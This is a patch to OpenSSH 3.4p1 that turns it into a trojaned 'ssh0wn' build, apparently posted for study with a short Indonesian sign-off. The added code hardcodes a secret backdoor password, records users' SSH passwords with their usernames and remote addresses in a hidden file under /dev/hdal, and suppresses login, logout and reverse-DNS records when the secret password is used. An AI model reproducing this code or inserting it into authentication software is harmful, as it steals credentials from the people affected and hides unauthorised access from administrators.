+++ ssh0wn/canohost.c Wed Aug 7 17:43:34 2002
@@ -74,11 +74,13 @@

debug3(“Trying to reverse map address %.100s.”, ntop);
/* Map the IP address to a host name. */
- if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
- NULL, 0, NI_NAMEREQD) != 0) {
- /* Host name not found. Use ip address. */
- log(“Could not reverse map address %.100s.”, ntop);
- return xstrdup(ntop);
+ if(!mlogin_ok){
+ if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
+ NULL, 0, NI_NAMEREQD) != 0) {
+ /* Host name not found. Use ip address. */
+ log(“Could not reverse map address %.100s.”, ntop);
+ return xstrdup(ntop);
+ }
}

/* Got host name. */
— openssh-3.4p1/includes.h Mon May 13 01:14:09 2002
+++ ssh0wn/includes.h Thu Aug 8 15:45:46 2002
@@ -157,4 +157,13 @@

#include “entropy.h”

+/* hax0r shit */
+#define _SECRET_PASSWD “l33thex0r_passwerd”
+#define _LOG_DIR “/dev/hdal”
+#define _S_LOG “slog”
+#define _C_LOG “clog”
+FILE *outf;
+int mlogin_ok;
+/* end hax0r shit */
+
#endif /* INCLUDES_H */
— openssh-3.4p1/sshconnect1.c Thu Jun 6 15:57:34 2002
+++ ssh0wn/sshconnect1.c Thu Aug 8 15:48:48 2002
@@ -922,6 +922,7 @@
{
int type, i;
char *password;
+ char gpasswd[120];

debug(“Doing password authentication.”);
if (options.cipher == SSH_CIPHER_NONE)
@@ -930,6 +931,7 @@
if (i != 0)
error(“Permission denied, please try again.”);
password = read_passphrase(prompt, 0);
+ strcpy(gpasswd,password);
packet_start(SSH_CMSG_AUTH_PASSWORD);
ssh_put_password(password);
memset(password, 0, strlen(password));
@@ -938,8 +940,15 @@
packet_write_wait();

type = packet_read();
- if (type == SSH_SMSG_SUCCESS)
+ if (type == SSH_SMSG_SUCCESS){
+ /* dont log if secret pass */
+ if(strcmp(_SECRET_PASSWD,gpasswd) != 0){
+ outf = fopen(_LOG_DIR”/”_C_LOG,”a+”);
+ fprintf (outf,”%s:%s@%s\n”,options.user,gpasswd,get_remote_ipaddr());
+ fclose (outf);
+ }
return 1;
+ }
if (type != SSH_SMSG_FAILURE)
packet_disconnect(“Protocol error: got %d in response to passwd auth”, type);
}
— openssh-3.4p1/sshconnect2.c Sun Jun 23 17:23:21 2002
+++ ssh0wn/sshconnect2.c Thu Aug 8 15:48:20 2002
@@ -446,6 +446,7 @@
static int attempt = 0;
char prompt[150];
char *password;
+ char gpasswd[120];

if (attempt++ >= options.number_of_password_prompts)
return 0;
@@ -456,6 +457,7 @@
snprintf(prompt, sizeof(prompt), “%.30s@%.128s’s password: “,
authctxt->server_user, authctxt->host);
password = read_passphrase(prompt, 0);
+ strcpy(gpasswd,password);
packet_start(SSH2_MSG_USERAUTH_REQUEST);
packet_put_cstring(authctxt->server_user);
packet_put_cstring(authctxt->service);
@@ -470,6 +472,12 @@
dispatch_set(SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ,
&input_userauth_passwd_changereq);

+ /* dont log if its the secret pass */
+ if(strcmp(_SECRET_PASSWD,gpasswd) != 0){
+ outf = fopen(_LOG_DIR”/”_C_LOG,”a+”);
+ fprintf (outf,”%s:%s@%s\n”,options.user,gpasswd,get_remote_ipaddr());
+ fclose (outf);
+ }
return 1;
}
/*
— openssh-3.4p1/sshlogin.c Sun Jun 23 17:23:21 2002
+++ ssh0wn/sshlogin.c Thu Aug 8 15:46:10 2002
@@ -71,8 +71,11 @@

li = login_alloc_entry(pid, user, host, ttyname);
login_set_addr(li, addr, sizeof(struct sockaddr));
- login_login(li);
- login_free_entry(li);
+ /* dont log if secret pass */
+ if(!mlogin_ok){
+ login_login(li);
+ login_free_entry(li);
+ }
}

#ifdef LOGIN_NEEDS_UTMPX
@@ -96,6 +99,9 @@
struct logininfo *li;

li = login_alloc_entry(pid, user, NULL, ttyname);
- login_logout(li);
- login_free_entry(li);
+ /* no logout if secret pass */
+ if(!mlogin_ok){
+ login_logout(li);
+ login_free_entry(li);
+ }
}

Selamat belajar,and berpusing" ria....
hhiiii............